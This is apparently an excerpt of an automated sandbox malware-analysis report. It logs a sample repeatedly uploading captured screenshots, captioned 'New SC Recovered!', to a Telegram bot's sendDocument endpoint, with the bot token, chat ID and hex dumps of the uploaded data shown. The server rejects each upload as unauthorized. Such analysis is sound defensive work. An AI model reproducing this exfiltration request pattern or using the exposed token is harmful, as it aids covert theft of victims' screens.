                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:20 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:20 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:20 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:20 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dccc3999cbfb48--
                                                2024-07-25 22:01:20 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:20 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.649735149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:22 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcceb63c23233e
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:22 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:22 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 36 2f 32 30 32 34 20 32 30 3a 35 35 3a 31 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcceb63c23233eContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcceb63c23233eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/06/2024 20:55:19User
                                                2024-07-25 22:01:22 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:22 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:22 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:22 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:22 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 62 36 33 63 32 33 32 33 33 65 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcceb63c23233e--
                                                2024-07-25 22:01:22 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:22 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.649736149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:35 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcd5311bcd1988
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:35 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:01:35 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 35 2f 32 30 32 34 20 30 32 3a 34 30 3a 30 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcd5311bcd1988Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcd5311bcd1988Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/15/2024 02:40:05User
                                                2024-07-25 22:01:35 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:35 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:35 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:01:35 UTC7412OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:01:35 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 35 33 31 31 62 63 64 31 39 38 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcd5311bcd1988--
                                                2024-07-25 22:01:35 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:01:35 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.649737149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:01:39 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcd883f159ae3d
                                                Host: api.telegram.org
                                                Content-Length: 57551
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:01:40 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 38 38 33 66 31 35 39 61 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 31 39 2f 32 30 32 34 20 30 38 3a 31 30 3a 33 34 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcd883f159ae3dContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcd883f159ae3dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/19/2024 08:10:34User
                                                2024-07-25 22:01:40 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:01:40 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:01:40 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 